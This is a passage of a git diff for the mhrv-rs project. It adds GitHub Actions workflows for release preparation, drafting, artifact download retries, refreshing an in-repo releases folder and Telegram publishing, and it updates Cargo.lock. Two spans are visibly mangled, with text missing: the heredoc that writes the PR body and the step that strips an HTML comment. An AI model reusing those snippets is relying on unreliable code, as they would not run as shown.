+ + - name: Commit, push, and open PR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + NEW_VER: ${{ steps.ver.outputs.version }} + BRANCH: ${{ steps.ver.outputs.branch }} + run: | + set -euo pipefail + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git checkout -b "$BRANCH" + git add Cargo.toml Cargo.lock android/app/build.gradle.kts \ + "docs/changelog/v${NEW_VER}.md" + git commit -m "release: prepare v${NEW_VER}" + git push -u origin "$BRANCH" + + # Write the PR body to a file rather than fight nested heredoc + # escaping in the YAML run: block. + # + # IMPORTANT: this heredoc terminator (`MSG`) is INTENTIONALLY + # unquoted so that ${NEW_VER} and ${BRANCH} expand. Backticks + # in the body are escaped (\`) for the same reason. If you + # paste anything into the template below, watch out for `$(...)` + # and unescaped backticks — they will execute at workflow run + # time. To add a static block that should NOT interpolate, build + # it with a separate `<<'STATIC'` heredoc and concat afterward. + cat > /tmp/pr-body.md <\` with a short explanatory clause matching the project's \`• headline (#NN): full explanation\` style. The Conventional-Commit prefix (\`feat:\`/\`fix:\`/etc.) and the trailing \`. Thanks @author\` are already handled. + 3. Commit + push to this branch so the PR includes the final bilingual changelog. + + Any \`[FA]\` or \`\` markers left in the file will ship verbatim into the GitHub Release page and the Telegram post — they're intentionally visible, not hidden in HTML comments. + + **After merging — ship it:** + 1. \`git checkout main && git pull\` + 2. \`git tag v${NEW_VER} && git push origin v${NEW_VER}\` + 3. \`release.yml\` picks up the tag, builds artifacts, creates the GitHub release, and (if enabled) posts to Telegram. 
+ MSG + + gh pr create \ + --base main \ + --head "$BRANCH" \ + --title "release: prepare v${NEW_VER}" \ + --label "release-prep" \ + --body-file /tmp/pr-body.md diff --git a/.github/workflows/release-drafter.yml b/.github/workflows/release-drafter.yml new file mode 100644 index 00000000..60e86445 --- /dev/null +++ b/.github/workflows/release-drafter.yml @@ -0,0 +1,65 @@ +# Updates the draft GitHub release on every push to main, and applies +# Conventional-Commit-derived labels to incoming PRs. Config lives in +# `.github/release-drafter.yml`. The drafter writes one line per merged +# PR into a draft release tagged `next`; `prepare-release.yml` reads +# that body when bumping versions so the English half of +# `docs/changelog/v.md` is prefilled. +# +# Cost: one ubuntu-latest job per relevant PR/push event, single API +# call, no compile, no tests. Zero contention with the self-hosted +# Hetzner runners that release.yml uses. + +name: release-drafter + +on: + push: + branches: [main] + # `pull_request_target` runs in the context of the base branch (main), + # which is what the autolabeler needs to write labels back to PRs — + # including PRs from forks, which the regular `pull_request` event + # doesn't grant write permissions for. We never check out PR code + # in this workflow (only call the action), so the elevated context + # is safe. + pull_request_target: + types: [opened, reopened, synchronize, edited] + +permissions: + contents: read + +jobs: + update-draft: + permissions: + contents: write # write the draft release object + pull-requests: write # apply autolabeler labels to incoming PRs + runs-on: ubuntu-latest + steps: + # Ensure the labels referenced by .github/release-drafter.yml's + # autolabeler block all exist. release-drafter logs a warning and + # skips when it tries to apply a label that's missing — labelling + # itself doesn't fail, but exclude-labels and downstream filtering + # become silent no-ops. 
`gh label create … || true` is idempotent:
+      # creates on first run, exits with "already exists" on every run
+      # after that. Cheap (6 API calls per workflow run, no compile).
+      - name: Ensure autolabeler labels exist
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          # Format: name|color|description (color without leading #).
+          while IFS='|' read -r name color desc; do
+            gh label create "$name" --color "$color" --description "$desc" \
+              --repo "${{ github.repository }}" 2>/dev/null || true
+          done <<'LABELS'
+          release-prep|ededed|Automated version-bump PR; excluded from release-drafter changelog
+          type: feature|a2eeef|feat: PR — auto-applied by release-drafter
+          type: fix|d73a4a|fix: PR — auto-applied by release-drafter
+          type: chore|cfd3d7|chore: PR — auto-applied by release-drafter
+          type: docs|0075ca|docs: PR — auto-applied by release-drafter
+          type: refactor|fbca04|refactor: PR — auto-applied by release-drafter
+          LABELS
+
+      - uses: release-drafter/release-drafter@v6
+        with:
+          config-name: release-drafter.yml
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 55caa258..8068b30c 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -77,6 +77,17 @@ jobs:
         - target: x86_64-pc-windows-gnu
           os: windows-latest
           name: mhrv-rs-windows-amd64
+      # i686-pc-windows-msvc target was attempted in v1.7.7-v1.7.10
+      # to support Windows 7 32-bit users (#272, #318). Removed in
+      # v1.7.11 because keeping it on Rust 1.77.2 (last Win7-stable)
+      # is fundamentally fragile: every transitive crate that bumps
+      # its MSRV (e.g. `time` 0.3.47 needs Cargo manifest features
+      # only available in Rust 1.78+) breaks the build, and pinning
+      # transitives is brittle across releases. Win7 users should
+      # self-build per the README; the project no longer ships a
+      # prebuilt i686 Win7 binary.
Replaced by the existing + # x86_64-pc-windows-gnu (windows-amd64) which covers ~99% of + # active Windows installs (incl. all WoA64 emulation). - target: x86_64-unknown-linux-musl os: [self-hosted, linux, x64, mhrv-build] name: mhrv-rs-linux-musl-amd64 @@ -138,9 +149,14 @@ jobs: # installed and the standard target triples are pre-added. It # still verifies the target is present and is cheap enough to keep # as a safety net. - - uses: dtolnay/rust-toolchain@stable + # Per-matrix-entry toolchain selection. Default is `stable` (latest) + # for every target except where `rust_toolchain` is explicitly pinned + # — currently just i686-pc-windows-msvc, which needs 1.77.2 to keep + # the Win7 binary loadable (Rust 1.78+ raised Windows MSRV to Win10). + - uses: dtolnay/rust-toolchain@master if: matrix.mipsel_softfloat != true with: + toolchain: ${{ matrix.rust_toolchain || 'stable' }} targets: ${{ matrix.target }} # Cache target/ + cargo registry across runs — this is the big @@ -159,7 +175,11 @@ jobs: - uses: Swatinem/rust-cache@v2 if: matrix.mipsel_softfloat != true with: - key: ${{ matrix.target }} + # Include toolchain in the cache key so a pinned-Rust target + # (i686-pc-windows-msvc on 1.77.2) doesn't collide with + # stable-Rust caches for other targets, and a future toolchain + # bump invalidates only the affected slot. + key: ${{ matrix.target }}-${{ matrix.rust_toolchain || 'stable' }} cache-bin: "false" # eframe needs a few system libs on Linux for window management, keyboard, @@ -578,10 +598,33 @@ jobs: with: fetch-depth: 0 - - uses: actions/download-artifact@v4 - with: - path: dist - merge-multiple: true + # `actions/download-artifact@v4` has been intermittently flaking on + # this workflow with "5 retries exhausted" on a single artifact (~10 + # of 13). Wrap it in a manual retry — usually the second attempt + # succeeds, the third nails any laggards. 
We use `gh run download` + # against the current run so we don't depend on the release page + # existing yet (it doesn't until the softprops step below runs). + - name: Download all build artifacts (with retries) + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + mkdir -p dist + for attempt in 1 2 3; do + if gh run download "${GITHUB_RUN_ID}" --dir dist --repo "${GITHUB_REPOSITORY}"; then + echo "downloaded all artifacts on attempt $attempt" + # `gh run download` puts each artifact in its own subdir; + # flatten so downstream steps that expect dist/ work + # the same as `merge-multiple: true` did. + find dist -type f -mindepth 2 -exec mv -f {} dist/ \; + find dist -type d -empty -delete + ls -la dist/ + exit 0 + fi + echo "download attempt $attempt failed; retrying in 30s..." + sleep 30 + done + echo "::error::failed to download artifacts after 3 attempts" + exit 1 # Compose the GitHub release body from `docs/changelog/v.md` # so the Releases page tells humans what actually changed — @@ -608,8 +651,22 @@ jobs: fi { echo 'body<<__RELEASE_BODY_EOF__' - # Strip leading HTML comment that documents the file format. - sed -e '1{/^\s*)+", "", body, count=1, flags=re.S), end="") + PY echo echo '__RELEASE_BODY_EOF__' } >> "$GITHUB_OUTPUT" @@ -636,43 +693,193 @@ jobs: append_body: true generate_release_notes: true - # Notify the Persian-speaking Telegram channel with the CI-built - # Android APK + its sha256 + the per-version changelog from - # `docs/changelog/v.md`. + # Refresh the in-repo `releases/` folder with the latest pre-built + # artifacts so users behind GitHub-Releases-page filtering (the IR + # state network filters the dynamic /releases/ URL but not the static + # `Code → Download ZIP` of the source tree) can still download. + # Practice was started pre-v1.1.0, dropped, then resumed at user + # request after a Telegram-channel suggestion: "فقط داخل پوشه ریلیز + # پروژه اپلود بکن — مشکل دانلود حل میشه — راحت میشه از گیتهاب دانلود + # کرد." 
The folder holds ONLY the latest version (replace, not + # archive); each tag refresh overwrites the previous artifacts. The + # existing release-page workflow keeps versioned artifacts behind + # `https://github.com/.../releases/tag/v...` for users who can reach + # that URL — this in-repo folder is the fallback for users who can't. + commit-releases: + needs: [build, android, release] + runs-on: ubuntu-latest + permissions: + contents: write + steps: + # Always check out main, not the tag — we're committing back to + # the moving branch. fetch-depth 0 so `git push origin HEAD:main` + # has the lineage to fast-forward. + - uses: actions/checkout@v4 + with: + ref: main + fetch-depth: 0 + + # Pull artifacts from the GitHub Release page (which the `release` + # job populated a few seconds earlier) rather than the workflow + # artifacts API. The artifacts API path — + # `actions/download-artifact@v4` with `merge-multiple: true` — + # has been failing with "artifact download failed after 5 + # retries" on one of the ~13 artifacts on multiple consecutive + # runs (v1.7.5 retrigger, v1.7.6). The 10 fast downloads that + # complete first all succeed; the 11th-13th hit the error. + # `gh release download` reads from GitHub's Release-page CDN, + # which is independent of the artifacts blob store and has a + # different retry / rate-limit profile. Same files, more + # reliable surface. + - name: Download artifacts from the GitHub Release page + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + VER="${{ inputs.version || github.ref_name }}" + # Strip leading `v` to normalize, then re-add — the Release + # tag is `vX.Y.Z`, but for the rest of the workflow we use + # bare `X.Y.Z`. Mirror the same pattern here so a downstream + # readme update can use the bare version. 
+          VER="${VER#v}"
+          mkdir -p artifacts
+          gh release download "v${VER}" \
+            --repo "${{ github.repository }}" \
+            --dir artifacts \
+            --pattern '*.tar.gz' \
+            --pattern '*.zip' \
+            --pattern '*.apk'
+          echo "--- artifacts/ contents ---"
+          ls -la artifacts/
+
+      - name: Refresh releases/ folder
+        run: |
+          set -euo pipefail
+          VER="${{ inputs.version || github.ref_name }}"
+          VER="${VER#v}"
+
+          mkdir -p releases
+
+          # Wipe old binary artifacts (.apk, .tar.gz, .zip) but keep
+          # README.md and .gitattributes — those are folder-level docs
+          # that stay constant across versions and shouldn't be
+          # regenerated on every release.
+          find releases -maxdepth 1 -type f \
+            \( -name '*.apk' -o -name '*.tar.gz' -o -name '*.zip' \) \
+            -delete
+
+          # Copy desktop archives. Their names already include the
+          # platform identifier (mhrv-rs-linux-amd64.tar.gz, etc.) and
+          # are version-stable — no rename needed.
+          for f in artifacts/*.tar.gz artifacts/*.zip; do
+            [ -f "$f" ] || continue
+            cp "$f" "releases/$(basename "$f")"
+          done
+
+          # Android APKs come with the version baked into the name
+          # (mhrv-rs-android-universal-v1.7.5.apk). Copy all of them so
+          # users on slow connections can grab a per-ABI APK (~37 MB)
+          # instead of the universal (~110 MB).
+          for f in artifacts/mhrv-rs-android-*.apk; do
+            [ -f "$f" ] || continue
+            cp "$f" "releases/$(basename "$f")"
+          done
+
+          # Update the "Current version" line in releases/README.md
+          # (both English and Persian copies) and APK filename refs so
+          # the doc stays accurate. `sed -i` BSD/GNU compatibility is
+          # handled by passing an explicit backup suffix (`.bak`) —
+          # that form works with both GNU sed and BSD/macOS sed for
+          # anyone running this locally; the .bak is removed after.
+ if [ -f releases/README.md ]; then + sed -i.bak \ + -e "s/Current version: \*\*v[0-9][0-9.]*\*\*/Current version: **v${VER}**/" \ + -e "s/نسخهٔ فعلی: \*\*v[0-9][0-9.]*\*\*/نسخهٔ فعلی: **v${VER}**/" \ + -e "s/mhrv-rs-android-universal-v[0-9][0-9.]*\.apk/mhrv-rs-android-universal-v${VER}.apk/g" \ + releases/README.md + rm -f releases/README.md.bak + fi + + echo "--- releases/ contents after refresh ---" + ls -la releases/ + + - name: Commit + push to main + run: | + set -euo pipefail + VER="${{ inputs.version || github.ref_name }}" + VER="${VER#v}" + + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + + git add releases + if git diff --cached --quiet; then + echo "No releases/ changes to commit (artifacts identical to current HEAD?)." + exit 0 + fi + + git commit -m "chore(releases): refresh prebuilt binaries for v${VER}" \ + -m "Auto-committed by release workflow so users behind GitHub-Releases-page filtering can download via the in-repo releases/ folder. The GitHub Release page itself still has the canonical versioned artifacts; this folder is the fallback path for users who can only reach the static source tree (Code → Download ZIP)." + + # Push to main. The release workflow runs on the tag commit, + # which is reachable from main as a fast-forward — push is + # straightforward, no force needed. Tag protection rules + # apply to refs/tags/* not refs/heads/main, so this push + # isn't gated by the same protection. + git push origin HEAD:main + + # ─────────── LEGACY — DORMANT BY DEFAULT ─────────── + # + # Posts the universal APK + per-version changelog to the **main** + # Telegram channel as one big sendDocument + sendMessage pair. 
+ # + # Superseded as of v1.8.0+ by `.github/workflows/telegram-publish-files.yml`, + # which posts each platform's artifact individually to the **files** + # channel (with SHA-256 captions) and then a single cross-link + # message to the main channel pointing at the files-channel anchor. + # + # This job stays in the source tree, dormant, in case we ever want + # to revert to the bundled-changelog-on-main-channel pattern (or + # use both at once during a transition). To turn it back on: + # + # gh variable set TELEGRAM_NOTIFY_ENABLED --body true # - # Two Telegram API calls: - # 1. sendDocument — APK file + a short caption (Telegram caps - # captions at 1024 chars, and we have bigger changelogs than - # that). - # 2. sendMessage — full changelog as a reply to #1, Persian - # quote-block first then English, same pattern as the - # previous manual post. No emojis, as the user asked. + # Note: with the new workflow active too, that produces TWO posts + # to the main channel per release (the legacy APK+changelog *and* + # the new cross-link). Pick one. # - # Needs two repo secrets: - # TELEGRAM_BOT_TOKEN — bot the channel admits as poster - # TELEGRAM_CHAT_ID — numeric chat id (starts with -100...) - # Missing either => the whole job is skipped (not failed) so a - # forker who hasn't set up a Telegram channel gets a clean release. + # Default state is disabled. telegram: needs: [android, release] runs-on: ubuntu-latest # Gated on the repo variable `TELEGRAM_NOTIFY_ENABLED`. Default is - # OFF — the job skips silently unless the variable is set to the - # literal string "true". Toggle via: - # - # gh variable set TELEGRAM_NOTIFY_ENABLED --body true - # gh variable set TELEGRAM_NOTIFY_ENABLED --body false - # - # Keeping the machinery (script + secrets) in place so flipping - # the switch back on is a one-liner, not a workflow edit. + # off — the job skips silently unless the variable is set to the + # literal string "true". 
if: ${{ vars.TELEGRAM_NOTIFY_ENABLED == 'true' && needs.android.result == 'success' }} steps: - uses: actions/checkout@v4 - - uses: actions/download-artifact@v4 - with: - name: mhrv-rs-android-universal - path: apk + # Same retry pattern as the `release` job above — `actions/download-artifact@v4` + # has been flaking on this workflow with 5-retries-exhausted errors. + - name: Download universal APK (with retries) + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + mkdir -p apk + for attempt in 1 2 3; do + if gh run download "${GITHUB_RUN_ID}" \ + --name mhrv-rs-android-universal \ + --dir apk \ + --repo "${GITHUB_REPOSITORY}"; then + echo "downloaded universal APK on attempt $attempt" + ls -la apk/ + exit 0 + fi + echo "download attempt $attempt failed; retrying in 30s..." + sleep 30 + done + echo "::error::failed to download universal APK after 3 attempts" + exit 1 - name: Post to Telegram env: diff --git a/.github/workflows/telegram-publish-files.yml b/.github/workflows/telegram-publish-files.yml new file mode 100644 index 00000000..e7d956b9 --- /dev/null +++ b/.github/workflows/telegram-publish-files.yml @@ -0,0 +1,137 @@ +name: Telegram publish release files + +# Posts every release artifact (Android APKs, Windows ZIP, macOS, Linux, +# OpenWRT, Raspbian) to the Telegram channel as individual messages with +# Persian captions and a #v hashtag. Files larger +# than the bot API's 50 MB ceiling are split into ~45 MB byte chunks +# server-side and posted as `.part_aa`, `.part_ab`, ... — recipients +# reassemble with `cat .part_* > `. +# +# This workflow is decoupled from `release.yml` so it can be re-triggered +# for any historical tag (e.g. to re-post v1.8.0 after a Telegram channel +# wipe) without rebuilding artifacts. It downloads from the GitHub Release +# page directly via `gh release download`, so the assets must already +# exist there. 
+ +on: + workflow_dispatch: + inputs: + version: + description: 'Release tag to publish (with or without the v prefix, e.g. 1.8.0 or v1.8.0)' + required: true + type: string + # Auto-trigger after a successful `release` workflow run. Posts files + # to Telegram once the release page exists. The `head_branch` of the + # triggering run is the tag name (e.g. `v1.8.0`) on tag-pushed releases, + # which is what we feed `gh release download`. + workflow_run: + workflows: [release] + types: [completed] + +permissions: + contents: read + +jobs: + publish: + # Skip when triggered by a `release` run that didn't succeed — no + # point posting half a release. Manual `workflow_dispatch` always + # runs (the user explicitly asked for it). + if: | + github.event_name == 'workflow_dispatch' + || github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + # Sparse checkout would be nicer but stock checkout is fast + # enough for a 5 MB workflow file + ~200 KB script. + fetch-depth: 1 + + - name: Resolve version + hashtag + id: ver + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + if [ -n "${{ inputs.version || '' }}" ]; then + VER="${{ inputs.version }}" + else + # workflow_run path. `head_branch` for a tag-pushed release + # workflow is the tag name (e.g. `v1.8.0`). + VER="${{ github.event.workflow_run.head_branch || '' }}" + fi + if [ -z "$VER" ]; then + echo "::error::could not determine version from inputs or workflow_run trigger" + exit 1 + fi + # Strip the leading `v` if present. + VER="${VER#v}" + # Hashtag: `#v` + version with dots removed. So 1.8.0 → #v180, + # 1.8.10 → #v1810, 2.0.0 → #v200. Predictable across releases. 
+ HASHTAG="#v$(echo "$VER" | tr -d '.')" + echo "version=$VER" >> "$GITHUB_OUTPUT" + echo "hashtag=$HASHTAG" >> "$GITHUB_OUTPUT" + echo "Resolved: version=$VER hashtag=$HASHTAG" + + - name: Download release assets + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + mkdir -p assets + # Mirror the retry pattern from `release.yml`'s download step — + # GitHub's release-asset CDN occasionally times out on cold + # tags. Three attempts with 30 s backoff covers most flakes. + for attempt in 1 2 3; do + if gh release download "v${{ steps.ver.outputs.version }}" \ + --dir assets \ + --repo "${GITHUB_REPOSITORY}"; then + echo "downloaded release assets on attempt $attempt" + ls -la assets/ + exit 0 + fi + echo "attempt $attempt failed; retrying in 30s..." + sleep 30 + done + echo "::error::failed to download release assets after 3 attempts" + exit 1 + + - name: Publish files to Telegram channel + env: + BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }} + # The files channel — supergroup-style negative ID, hard-coded + # rather than templated as a repo variable because there's only + # ever one of these and putting it in source makes the workflow + # auditable. The bot token already has post permissions there. + CHAT_ID: '-1003966234444' + # The main announcement channel. Receives a single cross-link + # message per release pointing at the file-channel anchor post, + # instead of the previous behaviour of attaching the universal + # APK + full changelog. Sourced from the same secret the + # legacy `telegram` job in release.yml used. + MAIN_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }} + # Public-username form of the files channel link. Used for + # both (a) the post-link in the main-channel cross-post — so + # `t.me//` works for everyone, not just members + # via `t.me/c//` — and (b) one of the two + # channel-join links rendered at the bottom of the cross-post. 
+ # Defaults to `mhrv_rs` (current public username); override via + # repo variable if the channel is renamed. + FILES_CHANNEL_USERNAME: ${{ vars.FILES_CHANNEL_USERNAME || 'mhrv_rs' }} + # `t.me/+` invite link for the files channel. Rendered + # as the second channel-join option in the main-channel + # cross-post — the only join path that works for users coming + # from outside Telegram search (private/restricted channels) + # or whose Telegram client doesn't resolve usernames cleanly. + # Override via repo variable if the channel's invite hash is + # rotated. + FILES_CHANNEL_INVITE: ${{ vars.FILES_CHANNEL_INVITE || 'https://t.me/+R1OyoHX2boA1ZDgx' }} + run: | + if [ -z "${BOT_TOKEN:-}" ]; then + echo "::error::TELEGRAM_BOT_TOKEN not set; can't publish" + exit 1 + fi + python3 .github/scripts/telegram_publish_files.py \ + --assets-dir assets \ + --version "${{ steps.ver.outputs.version }}" \ + --hashtag "${{ steps.ver.outputs.hashtag }}" diff --git a/Cargo.lock b/Cargo.lock index 66a711c2..05ff07cd 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -160,6 +160,12 @@ dependencies = [ "windows-sys 0.61.2", ] +[[package]] +name = "anyhow" +version = "1.0.102" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c" + [[package]] name = "arboard" version = "3.6.1" @@ -173,7 +179,7 @@ dependencies = [ "objc2-foundation 0.3.2", "parking_lot", "percent-encoding", - "windows-sys 0.52.0", + "windows-sys 0.60.2", "x11rb", ] @@ -556,6 +562,17 @@ dependencies = [ "libc", ] +[[package]] +name = "chacha20" +version = "0.10.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6f8d983286843e49675a4b7a2d174efe136dc93a18d69130dd18198a6c167601" +dependencies = [ + "cfg-if", + "cpufeatures 0.3.0", + "rand_core 0.10.1", +] + [[package]] name = "chrono" version = "0.4.44" @@ -753,6 +770,15 @@ dependencies = [ "libc", ] +[[package]] +name = "cpufeatures" +version = "0.3.0" 
+source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8b2a41393f66f16b0823bb79094d54ac5fbd34ab292ddafb9a0456ac9f87d201" +dependencies = [ + "libc", +] + [[package]] name = "crc32fast" version = "1.5.0" @@ -1070,18 +1096,6 @@ dependencies = [ "serde", ] -[[package]] -name = "enum-as-inner" -version = "0.6.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn 2.0.117", -] - [[package]] name = "enumn" version = "0.1.14" @@ -1417,8 +1431,22 @@ checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd" dependencies = [ "cfg-if", "libc", - "r-efi", + "r-efi 5.3.0", + "wasip2", +] + +[[package]] +name = "getrandom" +version = "0.4.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555" +dependencies = [ + "cfg-if", + "libc", + "r-efi 6.0.0", + "rand_core 0.10.1", "wasip2", + "wasip3", ] [[package]] @@ -1654,25 +1682,19 @@ checksum = "dfa686283ad6dd069f105e5ab091b04c62850d3e4cf5d67debad1933f55023df" [[package]] name = "hickory-proto" -version = "0.25.2" +version = "0.26.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8a6fe56c0038198998a6f217ca4e7ef3a5e51f46163bd6dd60b5c71ca6c6502" +checksum = "a916d0494600d99ecb15aadfab677ad97c4de559e8f1af0c129353a733ac1fcc" dependencies = [ - "async-trait", - "cfg-if", "data-encoding", - "enum-as-inner", - "futures-channel", - "futures-io", - "futures-util", "idna", "ipnet", + "jni 0.22.4", "once_cell", - "rand 0.9.4", + "rand 0.10.1", "ring", "thiserror 2.0.18", "tinyvec", - "tokio", "tracing", "url", ] @@ -1810,6 +1832,12 @@ dependencies = [ "zerovec", ] +[[package]] +name = "id-arena" +version = "2.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954" + [[package]] name = "idna" version = "1.1.0" @@ -1852,6 +1880,8 @@ checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9" dependencies = [ "equivalent", "hashbrown 0.17.0", + "serde", + "serde_core", ] [[package]] @@ -2030,6 +2060,12 @@ version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe" +[[package]] +name = "leb128fmt" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2" + [[package]] name = "libc" version = "0.2.185" @@ -2186,7 +2222,7 @@ dependencies = [ [[package]] name = "mhrv-rs" -version = "1.6.0" +version = "1.9.2" dependencies = [ "base64 0.22.1", "bytes", @@ -2861,6 +2897,16 @@ version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e8cf8e6a8aa66ce33f63993ffc4ea4271eb5b0530a9002db8455ea6050c77bfa" +[[package]] +name = "prettyplease" +version = "0.2.37" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b" +dependencies = [ + "proc-macro2", + "syn 2.0.117", +] + [[package]] name = "proc-macro-crate" version = "3.5.0" @@ -2915,6 +2961,12 @@ version = "5.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f" +[[package]] +name = "r-efi" +version = "6.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf" + [[package]] name = "rand" version = "0.8.6" @@ -2936,6 +2988,17 @@ dependencies = [ "rand_core 0.9.5", ] +[[package]] +name = "rand" +version = "0.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"d2e8e8bcc7961af1fdac401278c6a831614941f6164ee3bf4ce61b7edb162207" +dependencies = [ + "chacha20", + "getrandom 0.4.2", + "rand_core 0.10.1", +] + [[package]] name = "rand_chacha" version = "0.3.1" @@ -2974,6 +3037,12 @@ dependencies = [ "getrandom 0.3.4", ] +[[package]] +name = "rand_core" +version = "0.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "63b8176103e19a2643978565ca18b50549f6101881c443590420e4dc998a3c69" + [[package]] name = "raw-window-handle" version = "0.5.2" @@ -3163,7 +3232,7 @@ dependencies = [ "errno", "libc", "linux-raw-sys 0.4.15", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] @@ -3305,7 +3374,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283" dependencies = [ "cfg-if", - "cpufeatures", + "cpufeatures 0.2.17", "digest", ] @@ -3461,9 +3530,9 @@ dependencies = [ [[package]] name = "socks5-impl" -version = "0.8.1" +version = "0.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1eae7c78f163b7805f66493c787d7bad4816146faf0cf655d57c78b90c383ce3" +checksum = "150816c2d954315f351129f438f851285e1ddb6d6ccc850ddd45c523d19abda0" dependencies = [ "async-trait", "bytes", @@ -3567,7 +3636,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd" dependencies = [ "fastrand", - "getrandom 0.3.4", + "getrandom 0.4.2", "once_cell", "rustix 1.1.4", "windows-sys 0.61.2", @@ -3891,9 +3960,9 @@ dependencies = [ [[package]] name = "tun2proxy" -version = "0.7.20" +version = "0.7.21" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0576f75fd691ad86cdc4348f29fb8770037ab8140179f1f9f8f6991f7ebd2176" +checksum = "d336ad07beb04a9e219972fcdc54a71d2586cdfd35ac03551a629e4ca328db3c" dependencies = [ "android_logger", "async-trait", @@ -4061,7 +4130,16 @@ version = "1.0.3+wasi-0.2.9" 
source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "20064672db26d7cdc89c7798c48a0fdfac8213434a1186e5ef29fd560ae223d6" dependencies = [ - "wit-bindgen", + "wit-bindgen 0.57.1", +] + +[[package]] +name = "wasip3" +version = "0.4.0+wasi-0.3.0-rc-2026-01-06" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5" +dependencies = [ + "wit-bindgen 0.51.0", ] [[package]] @@ -4119,6 +4197,40 @@ dependencies = [ "unicode-ident", ] +[[package]] +name = "wasm-encoder" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319" +dependencies = [ + "leb128fmt", + "wasmparser", +] + +[[package]] +name = "wasm-metadata" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909" +dependencies = [ + "anyhow", + "indexmap", + "wasm-encoder", + "wasmparser", +] + +[[package]] +name = "wasmparser" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe" +dependencies = [ + "bitflags 2.11.1", + "hashbrown 0.15.5", + "indexmap", + "semver", +] + [[package]] name = "wayland-backend" version = "0.3.15" @@ -4467,7 +4579,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.61.2", + "windows-sys 0.48.0", ] [[package]] @@ -4945,12 +5057,100 @@ dependencies = [ "winreg", ] +[[package]] +name = "wit-bindgen" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5" +dependencies = [ + "wit-bindgen-rust-macro", +] + 
